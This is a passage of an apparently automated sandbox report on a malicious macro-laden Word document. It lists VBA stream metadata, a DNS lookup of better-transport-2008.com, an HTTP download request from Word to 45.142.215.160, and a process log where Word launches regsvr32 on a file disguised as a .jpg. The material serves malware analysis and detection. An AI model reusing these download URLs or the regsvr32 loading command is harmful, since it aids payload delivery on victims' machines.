                      Stream Size:4855
                      Entropy:4.66602075705
                      Base64 Encoded:False
                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                      Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2486
                      General
                      Stream Path:VBA/__SRP_0
                      File Type:data
                      Stream Size:2486
                      Entropy:3.64532699898
                      Base64 Encoded:True
                      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ N . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . W
                      Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 214
                      General
                      Stream Path:VBA/__SRP_1
                      File Type:data
                      Stream Size:214
                      Entropy:1.76333029747
                      Base64 Encoded:False
                      Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                      Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 348
                      General
                      Stream Path:VBA/__SRP_2
                      File Type:data
                      Stream Size:348
                      Entropy:1.78667786328
                      Base64 Encoded:False
                      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 106
                      General
                      Stream Path:VBA/__SRP_3
                      File Type:data
                      Stream Size:106
                      Entropy:1.35911194617
                      Base64 Encoded:False
                      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
                      Stream Path: VBA/dir, File Type: Tower/XP rel 3 object not stripped - version 18435, Stream Size: 1172
                      General
                      Stream Path:VBA/dir
                      File Type:Tower/XP rel 3 object not stripped - version 18435
                      Stream Size:1172
                      Entropy:6.62532484228
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . | b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . . . m . .

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      Timestamp                            | Source Port | Dest Port | Source IP      | Dest IP
                      Apr 28, 2021 17:59:22.648822069 CEST | 49167       | 80        | 192.168.2.22   | 45.142.215.160
                      Apr 28, 2021 17:59:22.716659069 CEST | 80          | 49167     | 45.142.215.160 | 192.168.2.22
                      Apr 28, 2021 17:59:22.716862917 CEST | 49167       | 80        | 192.168.2.22   | 45.142.215.160
                      Apr 28, 2021 17:59:22.717869997 CEST | 49167       | 80        | 192.168.2.22   | 45.142.215.160
                      Apr 28, 2021 17:59:22.789505959 CEST | 80          | 49167     | 45.142.215.160 | 192.168.2.22
                      Apr 28, 2021 17:59:23.055886030 CEST | 80          | 49167     | 45.142.215.160 | 192.168.2.22
                      Apr 28, 2021 17:59:23.056277037 CEST | 49167       | 80        | 192.168.2.22   | 45.142.215.160
                      Apr 28, 2021 17:59:23.534882069 CEST | 49167       | 80        | 192.168.2.22   | 45.142.215.160

                      UDP Packets

                      Timestamp                            | Source Port | Dest Port | Source IP    | Dest IP
                      Apr 28, 2021 17:59:22.558387995 CEST | 52197       | 53        | 192.168.2.22 | 8.8.8.8
                      Apr 28, 2021 17:59:22.628182888 CEST | 53          | 52197     | 8.8.8.8      | 192.168.2.22

                      DNS Queries

                      Timestamp                            | Source IP    | Dest IP | Trans ID | OP Code            | Name                      | Type           | Class
                      Apr 28, 2021 17:59:22.558387995 CEST | 192.168.2.22 | 8.8.8.8 | 0x62a5   | Standard query (0) | better-transport-2008.com | A (IP address) | IN (0x0001)

                      DNS Answers

                      Timestamp                            | Source IP | Dest IP      | Trans ID | Reply Code   | Name                      | CName | Address        | Type           | Class
                      Apr 28, 2021 17:59:22.628182888 CEST | 8.8.8.8   | 192.168.2.22 | 0x62a5   | No error (0) | better-transport-2008.com |       | 45.142.215.160 | A (IP address) | IN (0x0001)

                      HTTP Request Dependency Graph

                      • better-transport-2008.com

                      HTTP Packets

                      Session ID | Source IP    | Source Port | Destination IP | Destination Port | Process
                      0          | 192.168.2.22 | 49167       | 45.142.215.160 | 80               | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

                      Timestamp                            | kBytes transferred | Direction | Data
                      Apr 28, 2021 17:59:22.717869997 CEST | 0                  | OUT       | GET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1
                      Accept: */*
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: better-transport-2008.com
                      Connection: Keep-Alive
                      Apr 28, 2021 17:59:23.055886030 CEST | 1                  | IN        | HTTP/1.1 200 OK
                      Date: Wed, 28 Apr 2021 15:59:22 GMT
                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                      X-Powered-By: PHP/7.2.34
                      Content-Length: 204
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "laka4" was not found on this server.</p></body></html>


                      Code Manipulations

                      Statistics

                      Behavior


                      System Behavior

                      General

                      Start time:17:59:30
                      Start date:28/04/2021
                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Imagebase:0x13fc90000
                      File size:1424032 bytes
                      MD5 hash:95C38D04597050285A18F66039EDB456
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:17:59:34
                      Start date:28/04/2021
                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Imagebase:0x13fc90000
                      File size:1424032 bytes
                      MD5 hash:95C38D04597050285A18F66039EDB456
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:17:59:35
                      Start date:28/04/2021
                      Path:C:\Windows\System32\regsvr32.exe
                      Wow64 process (32bit):false
                      Commandline:regsvr32 c:\programdata\argumentSelectTmp.jpg
                      Imagebase:0xffdc0000
                      File size:19456 bytes
                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Disassembly

                      Code Analysis
